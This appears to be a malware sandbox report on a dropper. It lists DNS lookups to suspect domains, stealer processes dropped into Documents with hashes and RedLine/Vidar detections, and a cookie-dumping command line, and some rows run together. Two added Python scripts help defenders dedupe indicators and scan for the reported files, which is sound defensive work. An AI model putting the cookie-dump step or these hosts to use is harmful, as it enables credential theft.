Jun 23, 2021 22:22:29.669856071 CEST | 8.8.8.8 | 192.168.2.4 | 0xb97b | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:39.287610054 CEST | 8.8.8.8 | 192.168.2.4 | 0xd6ab | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:51.667308092 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf72 | No error (0) | www.facebook.com | star-mini.c10r.facebook.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 23, 2021 22:22:51.667308092 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf72 | No error (0) | star-mini.c10r.facebook.com |  | 157.240.17.35 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:54.486530066 CEST | 8.8.8.8 | 192.168.2.4 | 0x7424 | No error (0) | sergeevih43.tumblr.com |  | 74.114.154.22 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:54.486530066 CEST | 8.8.8.8 | 192.168.2.4 | 0x7424 | No error (0) | sergeevih43.tumblr.com |  | 74.114.154.18 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:55.266367912 CEST | 8.8.8.8 | 192.168.2.4 | 0xf635 | No error (0) | www.browzar.com |  | 139.59.176.201 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:58.333359957 CEST | 8.8.8.8 | 192.168.2.4 | 0x4267 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:02.259687901 CEST | 8.8.8.8 | 192.168.2.4 | 0xabd7 | No error (0) | sergeevih43.tumblr.com |  | 74.114.154.22 | A (IP address) | IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:02.259687901 CEST8.8.8.8192.168.2.40xabd7No error (0)sergeevih43.tumblr.com74.114.154.18A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:03.335768938 CEST8.8.8.8192.168.2.40x64a9No error (0)iplis.ru88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:04.036205053 CEST8.8.8.8192.168.2.40xfbaNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:04.036205053 CEST8.8.8.8192.168.2.40xfbaNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:08.893635035 CEST8.8.8.8192.168.2.40xe5a1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:12.241560936 CEST8.8.8.8192.168.2.40xb4a2No error (0)uyg5wye.2ihsfa.com88.218.92.148A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:20.233007908 CEST8.8.8.8192.168.2.40xf5cdName error (3)g-partners.innonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:33.768657923 CEST8.8.8.8192.168.2.40x6aa1No error (0)g-partners.top138.68.187.227A (IP address)IN (0x0001)
                                                                                                                                                                                      Jun 23, 2021 22:23:46.922393084 CEST8.8.8.8192.168.2.40x3ba0No error (0)email.yg9.me198.13.62.186A (IP address)IN (0x0001)
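The DNS answers above are more useful as indicators once the CNAME rows are collapsed onto the address they finally resolve to, repeated failures (SERVFAIL for flamkravmaga.com, NXDOMAIN for g-partners.in before g-partners.top resolves) are separated from real resolutions, and unrelated names that land on one IP (iplis.ru and iplogger.org both on 88.99.66.31) are surfaced. The script below is an added example and not part of the Joe Sandbox report; the sample rows are copied from the table above, but the pipe-delimited layout they are written in is this script's own assumption, not the sandbox's export format.

```python
"""Turn sandbox DNS answer rows into a de-duplicated indicator list.

Added example, not part of the Joe Sandbox report. The rows below are
constructed from the report's DNS answers; the pipe-delimited layout is an
assumption of this script, not the sandbox's export format.
"""
from __future__ import annotations

import json
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample input: a subset of the report's DNS answers, one row per answer,
# columns Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
SAMPLE_ROWS = """\
Jun 23, 2021 22:22:22.413284063 CEST | 8.8.8.8 | 192.168.2.4 | 0xb872 | Server failure (2) | flamkravmaga.com | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:39.287610054 CEST | 8.8.8.8 | 192.168.2.4 | 0xd6ab | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:22:51.667308092 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf72 | No error (0) | www.facebook.com | star-mini.c10r.facebook.com | | CNAME (Canonical name) | IN (0x0001)
Jun 23, 2021 22:22:51.667308092 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf72 | No error (0) | star-mini.c10r.facebook.com | | 157.240.17.35 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:03.335768938 CEST | 8.8.8.8 | 192.168.2.4 | 0x64a9 | No error (0) | iplis.ru | | 88.99.66.31 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:08.893635035 CEST | 8.8.8.8 | 192.168.2.4 | 0xe5a1 | No error (0) | iplogger.org | | 88.99.66.31 | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:20.233007908 CEST | 8.8.8.8 | 192.168.2.4 | 0xf5cd | Name error (3) | g-partners.in | none | none | A (IP address) | IN (0x0001)
Jun 23, 2021 22:23:33.768657923 CEST | 8.8.8.8 | 192.168.2.4 | 0x6aa1 | No error (0) | g-partners.top | | 138.68.187.227 | A (IP address) | IN (0x0001)
"""

RCODE_RE = re.compile(r"\((\d+)\)\s*$")  # "Server failure (2)" -> 2


@dataclass(frozen=True)
class Answer:
    name: str
    cname: str | None
    address: str | None
    rcode: int
    rrtype: str


def _field(value: str) -> str | None:
    """The sandbox prints 'none' for failed lookups and leaves a blank for N/A; treat both as absent."""
    value = value.strip()
    return None if value in ("", "none") else value


def parse_rows(text: str) -> list[Answer]:
    answers: list[Answer] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cols = [c.strip() for c in line.split("|")]
        if len(cols) != 10:
            raise ValueError(f"expected 10 columns, got {len(cols)}: {line!r}")
        _ts, _src, _dst, _txid, reply, name, cname, address, rrtype, _cls = cols
        m = RCODE_RE.search(reply)
        if m is None:
            raise ValueError(f"unparseable reply code: {reply!r}")
        answers.append(Answer(name.lower().rstrip("."), _field(cname), _field(address),
                              int(m.group(1)), rrtype.split()[0]))
    return answers


def build_indicators(answers: list[Answer]) -> dict:
    cnames = {a.name: a.cname for a in answers if a.cname}  # alias -> target
    resolved: dict[str, set[str]] = defaultdict(set)
    failed: dict[str, int] = {}
    for a in answers:
        if a.rcode != 0:
            failed[a.name] = a.rcode          # SERVFAIL/NXDOMAIN: dead or rotated infrastructure
            continue
        if a.address:
            resolved[a.name].add(a.address)
    # Walk CNAME chains so an alias inherits the addresses of its final target.
    for alias, target in cnames.items():
        seen = set()
        while target in cnames and target not in seen:
            seen.add(target)
            target = cnames[target]
        resolved[alias] |= resolved.get(target, set())
    # Unrelated names sharing an address hint at common hosting; aliases are skipped
    # because sharing an IP with their own CNAME target is expected.
    by_ip: dict[str, set[str]] = defaultdict(set)
    for name, ips in resolved.items():
        if name in cnames:
            continue
        for ip in ips:
            by_ip[ip].add(name)
    shared = {ip: sorted(names) for ip, names in by_ip.items() if len(names) > 1}
    return {"resolved": {k: sorted(v) for k, v in resolved.items()},
            "failed": failed, "shared_ip": shared}


if __name__ == "__main__":
    print(json.dumps(build_indicators(parse_rows(SAMPLE_ROWS)), indent=2))
```

Feed it the full table and the "resolved" map becomes the domain-to-IP block list, "failed" the names worth watching for later re-registration, and "shared_ip" the hosting clusters to pivot on.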
• 136.144.41.133
• 136.144.41.152
• freeprivacytoolsforyou.xyz
• nicepricingsaleregistration.com
• ip-api.com
• www.browzar.com
• 159.69.20.131
• https:
  • 101.36.107.74
• uyg5wye.2ihsfa.com
• g-partners.top

Code Manipulations

Statistics

Behavior

System Behavior

Start time: 22:22:11
Start date: 23/06/2021
Path: C:\Users\user\Desktop\yevbZfdCqR.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\yevbZfdCqR.exe'
Imagebase: 0x1210000
File size: 798208 bytes
MD5 hash: 3568D61A49B61CE18BD6093748FFD32A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
Imagebase: 0x400000
File size: 433664 bytes
MD5 hash: 9E78E5805208ADE76F61A62A8E42D763
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
Imagebase: 0x400000
File size: 714240 bytes
MD5 hash: A4663FF564689BA0EFB19D8D82AA044F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.972549932.0000000000A4A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
Imagebase: 0xbf0000
File size: 371568 bytes
MD5 hash: 643397C445A8CED70CB110E7720C491D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
Imagebase: 0x400000
File size: 357376 bytes
MD5 hash: DF518E39A56E4EA23D0B2442FFD42AEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
Imagebase: 0x430000
File size: 620704 bytes
MD5 hash: F517276868E5C46A449A5F73603B4E6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Start time: 22:22:19
Start date: 23/06/2021
Path: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
Imagebase: 0x400000
File size: 790920 bytes
MD5 hash: 856CF6ED735093F5FE523F0D99E18424
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Start time: 22:22:20
Start date: 23/06/2021
Path: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
Imagebase: 0xe40000
File size: 696364 bytes
MD5 hash: 41C69A7F93FBE7EDC44FD1B09795FA67
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
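Every second-stage process listed in this section was launched from the user's Documents folder, and the report gives an MD5 for each. The script below is an added triage check, not part of the report: it walks a Documents folder, identifies PE files by their MZ and PE headers rather than by extension (a renamed executable is still an executable), and matches their MD5s against the hashes from these process records. The hash table is copied from the records; the header sanity bounds, the directory walk and the stub used to exercise it offline are this script's own assumptions.

```python
"""Triage check: find PE files under a Documents folder and match them against
the MD5 hashes of the second-stage executables listed in this report.

Added example, not part of the Joe Sandbox report. REPORTED_DROPS is copied from
the report's System Behavior records; everything else is this script's own logic.
"""
import hashlib
import os
import struct
import tempfile
from pathlib import Path

# MD5 -> file name, taken from the process records above (lower-cased for comparison)
REPORTED_DROPS = {
    "9e78e5805208ade76f61a62a8e42d763": "9PWySv_SmMZ5POEp2PUJ_lbI.exe",
    "a4663ff564689ba0efb19d8d82aa044f": "ZteJ0k9a2sM9jXcC3SndaipD.exe",
    "643397c445a8ced70cb110e7720c491d": "YX7wpjoMI0vZoMwVbFh9XNIC.exe",
    "df518e39a56e4ea23d0b2442ffd42aee": "MQ5u6_H0cs9EUXsesfNpGUNc.exe",
    "f517276868e5c46a449a5f73603b4e6a": "awTgWtFfNpBsevxQFHzT446w.exe",
    "856cf6ed735093f5fe523f0d99e18424": "ulVElw2mPS2j3QKCM9gOxM3j.exe",
    "41c69a7f93fbe7edc44fd1b09795fa67": "Xl5_fidIgZFRU48uwkdfjZGj.exe",
}


def is_pe(path: Path) -> bool:
    """True if the file starts with an MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    try:
        with open(path, "rb") as f:
            dos = f.read(0x40)
            if len(dos) < 0x40 or dos[:2] != b"MZ":
                return False
            (e_lfanew,) = struct.unpack_from("<I", dos, 0x3C)
            # Assumed sanity bound: real headers sit within the first few KiB; text that
            # happens to start with "MZ" yields a huge offset here and is rejected.
            if e_lfanew < 0x40 or e_lfanew > 0x1000:
                return False
            f.seek(e_lfanew)
            return f.read(4) == b"PE\x00\x00"
    except OSError:
        return False


def md5_file(path: Path) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_documents(root: Path, known=REPORTED_DROPS) -> dict:
    """Return PE files under root whose MD5 is in `known`, plus every other PE file found.
    The file extension is ignored on purpose: a renamed PE is still a PE."""
    hits, other_pe = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if not is_pe(p):
                continue
            digest = md5_file(p)
            if digest in known:
                hits.append((str(p), digest, known[digest]))
            else:
                other_pe.append((str(p), digest))
    return {"known": hits, "other_pe": other_pe}


def make_minimal_pe(path: Path) -> None:
    """Write a stub with a consistent MZ/PE header pair; only used to exercise the checks offline."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    header[0x40:0x44] = b"PE\x00\x00"
    path.write_bytes(bytes(header))


def demo() -> dict:
    """Offline exercise on a constructed Documents folder: one stub PE and one text file."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp) / "Documents"
        docs.mkdir()
        stub = docs / "dropped.bin"
        make_minimal_pe(stub)
        (docs / "notes.txt").write_text("MZ is not enough to be a PE file")
        return {
            "stub_is_pe": is_pe(stub),
            "text_is_pe": is_pe(docs / "notes.txt"),
            "against_report": scan_documents(docs),
            "against_own_hash": scan_documents(docs, known={md5_file(stub): "dropped.bin"}),
        }


if __name__ == "__main__":
    print(demo())
```

On a real host, call scan_documents(Path.home() / "Documents"); a non-empty "known" list is a confirmed match for this campaign, while "other_pe" lists executables in a folder that normally holds none and deserves a look regardless of hash.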
Start time: 22:22:20
Start date: 23/06/2021
Path: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
Imagebase: 0x400000
File size: 709632 bytes
MD5 hash: 3FA93FEB10F08753F207064325EE1274
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.994142610.0000000000ACA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
                                                                                                                                                                                      Imagebase:0xc90000
                                                                                                                                                                                      File size:1055000 bytes
                                                                                                                                                                                      MD5 hash:F85B88D232A348BF82B2B553F50DFBB8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
                                                                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                                                                      File size:994816 bytes
                                                                                                                                                                                      MD5 hash:AED57D50123897B0012C35EF5DEC4184
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                      Start time:22:22:21
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:2431039 bytes
                                                                                                                                                                                      MD5 hash:623C88CC55A2DF1115600910BBE14457
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:375296 bytes
                                                                                                                                                                                      MD5 hash:663FDF847D6B11308415FF86EBFFC275
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.946369604.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766043822.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.762967714.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.739471519.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003205218.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766714248.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.718558359.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.759921983.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.722503902.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003466769.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.773475326.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.742326442.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.725474792.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003521614.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840920801.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840850532.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.744015353.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.921076949.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.705454896.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.767127574.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.933364985.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766966642.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Start time:22:22:22
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Start time:22:22:22
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:612268 bytes
MD5 hash:E517017DD8609B293C5ADB489BE918FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:24
Start date:23/06/2021
Path:C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
Imagebase:0x400000
File size:4732456 bytes
MD5 hash:EA57C9A4177B1022EC4D053AF865CBC9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:29
Start date:23/06/2021
Path:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
Imagebase:0x400000
File size:13098974 bytes
MD5 hash:FF5864B23CEF0169322395F961AF31E9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:33
Start date:23/06/2021
Path:C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
Imagebase:0x9e0000
File size:371568 bytes
MD5 hash:643397C445A8CED70CB110E7720C491D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

Start time:22:22:38
Start date:23/06/2021
Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
Imagebase:0x400000
File size:188416 bytes
MD5 hash:7FEE8223D6E4F82D6CD115A28F0B6D58
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Start time:22:22:41
Start date:23/06/2021
Path:C:\Program Files (x86)\Company\NewProduct\file4.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Company\NewProduct\file4.exe'
Imagebase:0x400000
